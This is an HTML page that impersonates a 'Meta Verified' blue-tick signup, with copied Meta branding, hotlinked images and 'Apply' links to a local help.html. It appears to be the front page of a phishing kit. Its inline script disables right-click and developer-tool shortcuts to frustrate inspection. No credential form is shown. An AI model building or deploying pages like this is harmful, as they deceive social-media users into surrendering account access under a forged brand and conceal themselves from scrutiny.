<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="styles.css">
    <link rel="icon" href="https://pbs.twimg.com/media/GQB99gQaQAEUOZ7?format=png&name=small">
    <title>Meta Verified | Get a verified blue tick</title>
</head>
<body>
    <header>
        <nav>
            <div>
                <img width="120px" src="https://upload.wikimedia.org/wikipedia/commons/thumb/a/ab/Meta-Logo.png/2560px-Meta-Logo.png" alt="Meta Logo">
            </div>
        </nav>
    </header>

    <main class="terra">
        <div>
            <img width="80px" src="https://pbs.twimg.com/media/GXM9vqbawAEZSzC?format=png&name=360x360" alt="Meta Verified Icon">
            <p class="topic">Become <br> Meta Verified</p>

            <div class="as">
                <a href="help.html" class="links">Apply</a>
            </div>

            <p class="info">Grow your social presence with Meta Verified – a new subscription<br>
                bundle available for creators and businesses on Instagram and<br>
                Facebook.<br><br>
                Sign up now for creators
            </p>
            <p class="info"><b>Are you a business?</b> Get more information on</p>
            <a class="home-page" href="help.html">Meta verified for businesses</a><br><br>
            <i class="elg">Features, availability, and pricing may vary by region.</i>
        </div>
        <img width="500px" src="https://pbs.twimg.com/media/GXM-SalaUAAfMKT?format=jpg&name=small" alt="Art">
    </main>

    <script>
        document.addEventListener('contextmenu', function(e) {
            e.preventDefault();
        });
        document.onkeydown = function(e) {
            if (e.ctrlKey && (e.shiftKey || e.key === "I" || e.key === "i")) {
                e.preventDefault();
            }
        };
    </script>


</body>
</html>
